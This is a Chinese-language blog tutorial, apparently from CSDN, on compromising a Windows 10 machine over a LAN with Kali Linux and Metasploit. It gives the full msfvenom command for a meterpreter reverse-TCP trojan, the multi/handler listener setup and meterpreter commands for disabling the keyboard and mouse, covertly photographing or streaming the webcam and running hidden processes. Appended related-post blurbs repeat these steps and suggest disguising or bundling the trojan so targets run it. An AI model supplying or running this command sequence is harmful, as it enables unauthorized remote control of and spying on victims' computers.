kali linux外网渗透指定ip,kali Linux局域网渗透之win10

最新推荐文章于 2024-08-22 12:00:00 发布
最新推荐文章于 2024-08-22 12:00:00 发布
阅读量4.3k 收藏 30
点赞数 2
文章标签: kali linux外网渗透指定ip

kali机:192.168.198.134

win10:192.168.198.1

我们先来查看下自己的IP地址

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (587.31 KB, 下载次数: 15)

2020-1-17 15:36 上传

接着我们使用fping来扫描一下局域网内的所有IP

fping -g IP/24 -->扫描局域网内所有IP

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (629.88 KB, 下载次数: 10)

2020-1-17 15:36 上传

攻击正式开始

1.我们先用msfvenom来生成一个木马文件,它将在root目录生成一个名叫shell.exe文件

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.198.134 lport=5555 -f exe R > /root/shell.exe

LHOST -->本地的IP地址

LPORT -->反向连接到主机的端口

R> -->木马生成的保存输出路径

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (533.32 KB, 下载次数: 16)

2020-1-17 15:36 上传

2.打开msfconsole,键入以下代码

msf > use exploit/multi/handler -->设置模块

msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp -->设置payload为反向tcp连接

msf exploit(multi/handler) > set lhost 192.168.198.134 -->设置本地的IP地址

msf exploit(multi/handler) > set lport 5555 -->设置端口,需要跟前面生成的木马端口一致

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (565.29 KB, 下载次数: 14)

2020-1-17 15:36 上传

开始攻击

exploit -->执行攻击命令

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (570.52 KB, 下载次数: 12)

2020-1-17 15:36 上传

3.现在我把马放在自己本机上,由于隐私问题我们不放图片了

现在我们来运行shell.exe,然而并没有什么反应,但实际上木马已经运行了,kali也监听到了

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (583.66 KB, 下载次数: 14)

2020-1-17 15:36 上传

4.开始搞事

现在你又可以为所欲为了

部分指令如下

uictl开关键盘/鼠标

uictl [enable/disable] [keyboard/mouse/all] -->开启或禁止键盘/鼠标

uictl disable mouse -->禁用鼠标

uictl disable keyboard -->禁用键盘

webcam摄像头命令

webcam_list -->查看摄像头

webcam_snap -->通过摄像头拍照

webcam_stream -->通过摄像头开启视频

execute执行文件

execute -->在目标机中执行文件

execute -H -i -f cmd.exe -->创建新进程cmd.exe,-H不可见,-i交互详细指令请见:先知社区

我们以查看自己当前所在用户组为例

执行shell来运行cmd

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (600.23 KB, 下载次数: 16)

2020-1-17 15:36 上传

可以看出我们的用户名叫sievr,归属于sievr用户组

然后我们来验证一下

ff1c2f43e3e18c16925e243b57113a69.gif

watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3NpZXZy,size_16,color_FFFFFF,t_70.jpg (434.9 KB, 下载次数: 12)

2020-1-17 15:36 上传

完全正确

好的本次教程就到这里,有不懂的欢迎私信!

weixin_39796152
关注
kali渗透Windows
m0_61680503的博客
04-13 532
运用kali渗透Windows系统打开摄像头和截图
Kali利用msf渗透Windows电脑(超详细)
热门推荐
RFZ_322的博客
03-09 4万+
Msfvenom命令总结大全1.实时监控屏幕run vnc -i 2.打开摄像头webcam_snap 用kali入侵别人的电脑,手机,安卓,苹果,mac,linxu系统,渗透到对方电脑然后展开进攻
kali渗透内网和外网
最新发布
xnxqwzy的博客
08-22 615
第一步:输入msfvenom命令生成一个payload,相关参数与命令如下:-p:使用反向远程控制程序“windows/meterpreter/reverse_tcp”lhost:设置kaliIPlport:设置端口(要与下面的setlport保持一致)-f:文件的类型为exe类型-o:生成payload,名为payload.exe,保存在kali的/root目录下第二步:将生成的木马文件发送到对方电脑我们启动kalimsfconsole 进入msfconsole。
kali渗透测试win10
舌耳的博客
10-29 1万+
通过msfvenom生成木马 msfvenom -p windows/meterpreter/reverse_tcp lhost=自己地址 lport=端口号 -f exe x>XX.exe 把木马传过去,点开就会往自己开放的ip和端口发送一个tcp链接 在kali中 msfconsole msf > use exploit/multi/handler msf exp...
kali渗透Windows
m0_51786204的博客
04-03 1275
我们这里也可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面。本地端口自己随便设置一个没有被占用的端口号,如果端口号被占用那么文件会生成失败,换一个端口号就行。解释: 本地ip写自己KaliIP地址,用ifconfig就能查看自己KaliIP地址。(3)命令: set LhOST 192.168.32.1(填写自己主机的IP地址)(2)命令: sessions -i 1(选择需要攻击的用户,这里选择第 1 个)可以写个容易让目标主机上钩的名字。
Kali Linux-Metasploit入侵Windows10系统
冷色调的夏天的博客
08-01 3万+
Kali Linux-Metasploit入侵Windows10 写在前文 距离上一次写KALI黑客攻防的博文已是去年这个时候了 之所以再次动手写这类的文章一是因为兴趣,二是看到网上五花八门的文章都是复制粘贴过来的,而且并没有写的很清楚,因此就有了本篇博客的出现 免责声明 切勿根据本文做违法之事,如做违法之事皆于博主本人无关! 实验环境 以下环境可以是两台真实物理机,也可以是一台物理机安装虚拟机 上述两种情况我均已尝试成功,由于在一台电脑上写博文较为方便 因此之后的截图是在一台物理机上的。 KALI:(攻
Kali从入门到银手镯(三):利用Metasploit工具的Win7渗透测试
乐百川
07-13 4286
现在很多用户还在使用Win7系统,虽然我个人也非常喜欢Win7,也承认这是一款非常经典的系统。但是Win7已经在今年1月份彻底停止了支持,也就是说永远也不会得到安全更新和补丁修复了。这对用户来说是极大的危险,如果有条件的话,还是请使用最新版的Win10,并及时更新安全补丁,保护电脑。 今天就来看看如何利用Kali来对Win7进行渗透。这里使用的工具是大名鼎鼎的Metaspoit,集成了大量漏洞渗透工具。其中自然有臭名昭著的永恒之蓝工具,它利用了Windows系统的SMB漏洞, 漏洞编号是MS17-010。具
网络渗透学习笔记
weixin_45753182的博客
04-20 2792
内网环境配置 域 不同域之间的访问称为跨域访问 信任是可以传递的 为域控win2008配置静态ip,cmd中输入ncpa.cpl.配置完后,在cmd中输入dcpromo 创建dns是为了解析域名 win7 配置服务器就行 此时可以ping通域控 命令:清空dns缓存的 win2008中配好后的 有注册的记录 win7加入了cxh.com域 在win7中登录win2008域控主机,win2008主机就自动关机了 问题: ...
渗透测试实战之ARP欺骗攻击(ARP断网攻击)
爱玩游戏的黑客的博客
12-13 2545
渗透测试实战之ARP欺骗攻击(ARP断网攻击)
渗透测试笔记】一、环境搭建(VirtualBox+Kali+Metasploitable+Win10
【User Not Found】的博客
04-18 2273
We are all in the gutter, but some of us are looking at the stars. 身在井隅,心向璀璨。 目录VirtualBox安装Kali Linux安装Metasploitable靶机安装 VirtualBox安装 VirtualBox :一款开源虚拟机软件 下载地址:https://www.virtualbox.org/wiki/Dow...
内网渗透——内网信息收集
PICACHU+++的博客
07-22 1305
渗透测试进入内网之后,首先要对所处的内网环境进行判断,有以下三个方面:对当前机器角色进行判断对当前机器所处网络环境及拓扑结构进行判断分析对当前机器所处区域进行判断。
kaliwin10入侵测试
weixin_48900801的博客
03-19 3972
kaliwin10入侵及提权测试 在进行入侵检测之前,配置好网络环境,使其相互连通,才能进行入侵。在成功入侵之后拿到的只是一个基础的shell,要想拿到系统级别的shell,添加系统用户,获取用户登录口令,还需要进一步提权。 一、对windows 10入侵测试 环境 攻击机:Kali Linux 2019 ip:192.168.245.143 目标主机:Windows 10 ip:192.168.245.133 1.生成exe文件,在目标主机
kali-linux网络渗透
William234的博客
01-14 3413
kali-linux网络渗透 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证和渗透测试。由Offensive Security Ltd维护和资助。最先由Offensive Security的Mati Aharoni和Devon Kearns通过重写BackTrack来完成,BackTrack是他们之前写的用于取证的Linux发行版 。 Kali Linux
Kali使用Metasploit内、外网渗透windows系统
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
渗透测试之用Kali2022渗透Windows 10系统
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
01-18 509
1.渗透IP:192.168.1.35系统: KALI2022(vmware 16.0)2.靶机IP:192.168.1.16系统: Windows103.USB无线网卡。
Kali渗透Windows服务器
2301_77732591的博客
06-27 593
(2) 目标主机执行程序后,在kali终端中的检测程序会及时检测到。在检测到目标主机运行程序后,后门程序会反向连接到msf,之后msf发起第二次攻击(开始渗透),然后客户端(后门程序)连接到服务端(msf)。这个实验主要让我们学习漏洞扫描技术基本原理,了解其在网络攻防中的作用,掌握使用Kali中的Metasploit对目标主机渗透,并根据报告做出相应的防护措施。本实验通过利用kali进行漏洞扫描,使用Metasploit对目标主机进行渗透测试,并根据报告做出相应的防护措施,共分为3个实验步骤,详情如下;
vmware条件下使用kali linux虚拟机对windows10进行渗透攻击的记录(学习使用)
wcf2020的博客
11-14 8957
使用kali linux虚拟机对windows10进行渗透攻击的记录 一、安装vmware tools以保证在虚拟机上创建的文件与主机可相互移动: VMware Tools是VMware虚拟机中自带的一种增强工具,是VMware提供的增强虚拟显卡和硬盘性能、以及同步虚拟机与主机时钟的驱动程序。只有在VMware虚拟机中安装好了VMware Tools,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的功能,鼠标也可在虚拟机与主机之间自由移动(不用再按ctrl+alt),且虚拟机屏幕也可实现...
利用kali Linux 渗透windows 操作系统
YJlio的博客
03-05 7664
利用kali Linux 渗透windows 操作系统 一、实验目的:使用kali生成木马,渗透windows系统 二、实验内容: 使用kali中的Metasploit生成木马,控制windows系统 三、实验环境 需要从VMware Workstation 中创建两台虚拟机 一台kali linux和一台靶机windows系统 1、攻击者ip(kali) 192.168.63.21 2、靶机ip(windows)192.168.63.20 四、实验步骤 先将虚拟机的网络模式修改为桥接模
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值